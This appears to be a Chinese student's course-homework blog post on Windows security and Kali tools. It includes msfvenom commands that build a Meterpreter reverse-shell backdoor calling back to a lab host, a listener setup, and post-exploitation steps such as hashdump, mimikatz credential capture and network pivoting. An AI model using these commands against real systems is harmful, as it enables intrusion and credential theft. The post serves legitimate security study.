其他分享
首页 > 其他分享> > 2018-2019-2 20189215 《网络攻防技术》第七周作业

2018-2019-2 20189215 《网络攻防技术》第七周作业

作者:互联网

教材《网络攻防技术》第七章学习


第7章 Windows操作系统安全攻防

7.1 Windows操作系统基本框架概述

7.2 Windows操作系统的安全体系结构和机制

7.3 Windows远程安全攻防技术

7.4 Windows本地安全攻防技术

kali视频学习


26.KaliSecruity-漏洞利用之检索与利用

27.KaliSecruity-漏洞利用之Metasploit基础

Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。这些工具或许在渗透测试中的每一方面都不能成为最好用的工具,但组合起来的框架却让它变得很强大。

1.开启服务

Kali漏洞工具集中的重要组成工具,需要先开启两个PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。命令如下:

service postgresql start //启动postgresql数据库
service metasploit start

启动时发现显示错误,原因新的版本已经没有metasploit服务了。

需要使用以下方法打开带数据库支持的MSF服务:
输入msfdb init初始化MSF数据库,再输入msfconsole打开。

输入db_status在msf中可以查看数据库连接状态

如果不想每次开机都手工启动服务,配置随系统启动:

update-rc.d postgresql enable
update-rc.d metasploit enable

2.路径介绍

kali中,msf的路径为/usr/share/metasploit-framework

3.基本命令

4.测试示例

28.KaliSecruity-漏洞利用之Metasploit介绍

Meterpreter是Metasploit框架中的一个拓展模块,作为溢出成功后的攻击载荷使用。攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接。
常用的命令有:

background //将当前会话放置后台
load/use 加载模块
interact 切换进一个信道
migrate 迁移进程
run 执行一个已有的模块
Resource 执行一个已有的rc脚本常用的meterpreter类型:
payload windows/meterpreter/reverse_tcp

1.生成meterpreter后门

使用命令:
msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.69.195 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
发现设置成功后仍无法显示,因为新版本的kali下msfpayload已经被移除了。新版本中只要使用msfvenom就行了,它集成了msfpayload和msfencode的功能。

所以新版本中生成meterpreter后门的命令等同为:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.69.195 LPORT=2333 -i 5 -f exe > /root/door.exe

生成成功,将其移入XP系统中,xp系统的IP地址为172.16.69.109。

2.打开MSF,开启监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options

显示如下:

set LPORT 2333 \\设置监听端口
set LHOST 172.16.69.109  \\设置监听地址

设置后显示如下:

3.监听目标主机

在kali的msf中执行exploit开始监听,并且在目标主机上执行door.exe。

4.meterpreter shell

此时我们取得了一个meterpreter shell。在meterpreter shell中输入help查看可执行的命令,如sysinfo显示目标系统信息,hashdump抓取哈希,pwd显示当前路径等。


meterpreter还有一些扩展工具,使用load + tab键查看这些工具,然后选择所需工具进行使用(load mimikatz用来抓取系统明文)。

5.返回msf和进入sessions

输入background返回msf,如果想返回meterpreter shell,输入sessions查看ID,输入sessions -i ID选择想返回的会话。

29.KaliSecruity-漏洞利用之Metasploit后渗透测试

Meterpreter作为后渗透模块有很多类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。其有很多的功能,如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。
在跳板机获取一定权限后,需要积极的向内网主机权限发展,获取制定的目标信息,探查系统的漏洞,借助系统的漏洞,借助Msf已经得到的meterpreter后门,可以使系列的操作更容易。

1.查看跳板机的网卡设置

使用ifconfig命令:

2.添加路由表

run autoroute -s 10.0.0.1
这是在Metasploit最常用的方法,在添加路由表和session的关系后,便可以使用msf中的模块跨网段扫描或攻击。

3.开启socks代理

通过使用auxiliary/server/socks4a模块,创建一个socks代理,可以为浏览器,Sqlmap,Nmap等使用。

background //把session置于后台
search socks  //使用socks开代理
use auxiliary/server/socks4a
showoptions
exploit

使用以上命令开启:

4.进入session后,输入run可以看到在meterpreter上可以做的很多命令。

5.通过run post/可以看到后渗透测试的模块。

30.KaliSecruity-漏洞利用之BeEF

对XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,BeEf是一款丝毫不逊于XSS平台的工具。BeEf是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具,它扩展了跨站漏洞的利用,能hook很多浏览器并可以执行很多内嵌命令。

1.BeEF攻击示例

2.BeEF的Proxy功能

3.加载Metasploit

BeEF默认不加载Metasploit,如果要使用Metasploit丰富的攻击模块,需要做以下配置。

《Python 黑帽子》第六、九章


代码托管:
https://github.com/jsjliyang/python3-Black.Hat/tree/master/chapter6
https://github.com/jsjliyang/python3-Black.Hat/tree/master/chapter9

参考资料


标签:metasploit,20189215,漏洞,攻击,windows,2019,2018,meterpreter,输入
来源: https://www.cnblogs.com/jsjliyang/p/10671581.html